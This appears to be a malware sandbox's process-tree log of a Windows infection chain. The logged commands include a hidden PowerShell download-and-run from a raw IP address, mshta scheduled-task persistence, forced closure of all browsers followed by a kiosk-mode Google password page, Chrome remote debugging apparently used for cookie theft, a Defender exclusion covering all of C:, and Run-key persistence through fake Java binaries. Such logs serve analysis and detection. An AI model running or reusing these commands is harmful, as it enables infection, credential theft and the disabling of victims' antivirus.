        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:1856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5888
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "Y4sFLma1HjE" /tr "mshta \"C:\Temp\AdSm3roD2.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5780
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\AdSm3roD2.hta"
        7⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        
        PID:5752
      - C:\Users\Admin\AppData\Local\Temp\10369360101\61699e2e5c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369360101\61699e2e5c.exe"
        6⤵
        
        PID:1612
      - C:\Users\Admin\AppData\Local\Temp\10369370101\b6c995d07f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369370101\b6c995d07f.exe"
        6⤵
        
        PID:3712
      - C:\Users\Admin\AppData\Local\Temp\10369380101\10e5897733.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369380101\10e5897733.exe"
        6⤵
        
        PID:3224
      - C:\Users\Admin\AppData\Local\Temp\10369390101\c64ff38ffd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369390101\c64ff38ffd.exe"
        6⤵
        
        PID:2332
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5816
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:2692
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5212
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5980
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3696
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:1564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:3008
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {6acc609c-83f8-47ce-84b7-a42ff5302a1d} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:5172
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27135 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2488 -initialChannelId {73da8dc3-76e1-4142-b5be-69a933e8850f} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:6092
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3908 -prefsLen 25213 -prefMapHandle 3912 -prefMapSize 270279 -jsInitHandle 3916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3924 -initialChannelId {31d820b0-c8fa-4a2a-9282-c658cdbbe091} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:2668
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4124 -prefsLen 27325 -prefMapHandle 4128 -prefMapSize 270279 -ipcHandle 4196 -initialChannelId {44015a9d-e293-4f9d-a362-b954b9f8c336} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:960
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3144 -prefsLen 34824 -prefMapHandle 3300 -prefMapSize 270279 -jsInitHandle 1620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4052 -initialChannelId {5f9af043-7b60-49be-9953-06aeb2fbe1d0} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:4616
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5184 -prefsLen 35012 -prefMapHandle 5188 -prefMapSize 270279 -ipcHandle 5148 -initialChannelId {d7e32b85-fe49-4c60-9152-481d9ca92cf7} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:6152
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5404 -prefsLen 32952 -prefMapHandle 5400 -prefMapSize 270279 -jsInitHandle 5392 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {a8f6ba3b-7fc3-4951-a63c-cfbdb3aab4e8} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:6180
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5352 -prefsLen 32952 -prefMapHandle 5348 -prefMapSize 270279 -jsInitHandle 5344 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5340 -initialChannelId {628cdd1d-6505-4555-9623-d07f9d1a4e36} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:6188
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5784 -prefsLen 32952 -prefMapHandle 5788 -prefMapSize 270279 -jsInitHandle 5792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5800 -initialChannelId {90ee491f-fa56-409c-b5ee-30edab2c1694} -parentPid 3008 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3008" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:6224
      - C:\Users\Admin\AppData\Local\Temp\10369400101\a964f1b160.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369400101\a964f1b160.exe"
        6⤵
        
        PID:5336
      - C:\Users\Admin\AppData\Local\Temp\10369430101\218e061657.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369430101\218e061657.exe"
        6⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369430101\218e061657.exe"
        7⤵
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\10369440101\37be90cf60.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369440101\37be90cf60.exe"
        6⤵
        
        PID:9584
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369440101\37be90cf60.exe"
        7⤵
        
        PID:25888
      - C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"
        6⤵
        
        PID:20952
      - C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"
        6⤵
        
        PID:26168
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26212
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 26368 -s 468
        8⤵
        Program crash
        
        PID:26284
      - C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"
        6⤵
        
        PID:9536
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:9520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:5096
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4ba2dcf8,0x7ffd4ba2dd04,0x7ffd4ba2dd10
        9⤵
        
        PID:7228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1944,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3
        9⤵
        
        PID:8588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2112,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:2
        9⤵
        
        PID:8600
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:8
        9⤵
        
        PID:8380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:8948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:8952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3980,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:7744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4536,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:18988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:8
        9⤵
        
        PID:18724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,8946142559945556597,8859286226762947768,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:8
        9⤵
        
        PID:17212
      - C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"
        6⤵
        
        PID:9676
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26172
      - C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"
        6⤵
        
        PID:9052
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:7136
      - C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe"
        6⤵
        
        PID:18688
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:18612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:18124
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:18600
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:24824
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:24804
      - C:\Users\Admin\AppData\Local\Temp\10369530101\6dbce1691c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369530101\6dbce1691c.exe"
        6⤵
        
        PID:17308
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:17228

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3932

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:1040

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3412

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5660

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4904

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe"
1⤵
PID:1012
- C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
  2⤵
  PID:5552
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    3⤵
    PID:4848
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
      4⤵
      PID:2848
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        5⤵
        
        PID:1248
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        6⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        7⤵
        
        PID:5232
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_platform.exe"
        8⤵
        Modifies registry key
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe\"'"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe"
1⤵
PID:2684
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
  2⤵
  PID:5552
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      4⤵
      PID:5592
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        5⤵
        
        PID:2100
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        6⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        7⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        8⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        9⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        10⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        11⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        12⤵
        
        PID:3584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        13⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        14⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        15⤵
        
        PID:7148
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        16⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        17⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        18⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        19⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        20⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        21⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        22⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        24⤵
        
        PID:6388
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
        25⤵
        Modifies registry key
        
        PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\fL8AvfRMZnVfIY0a.exe
1⤵
PID:2492
- C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\fL8AvfRMZnVfIY0a.exe
  C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\fL8AvfRMZnVfIY0a.exe
  2⤵
  PID:9724
- - C:\Users\Admin\AppData\Local\Temp\FH7rk1T9\th1D7SD1KwxIvMWK.exe
    C:\Users\Admin\AppData\Local\Temp\FH7rk1T9\th1D7SD1KwxIvMWK.exe 9724
    3⤵
    PID:9756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9756 -s 616
      4⤵
      Program crash
      PID:12568
- - C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\TzxcQksYaFPF40Zr.exe
    C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\TzxcQksYaFPF40Zr.exe 9724
    3⤵
    PID:26436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 26436 -s 1292
      4⤵
      Program crash
      PID:18932
- - C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\BjgCwyLK4ArJIStP.exe
    C:\Users\Admin\AppData\Local\Temp\LlNhOyOk\BjgCwyLK4ArJIStP.exe 9724
    3⤵
    PID:20144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 9756 -ip 9756
1⤵
PID:12440

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:13000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1068 -ip 1068
1⤵
PID:19180

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:20940

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:20984

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
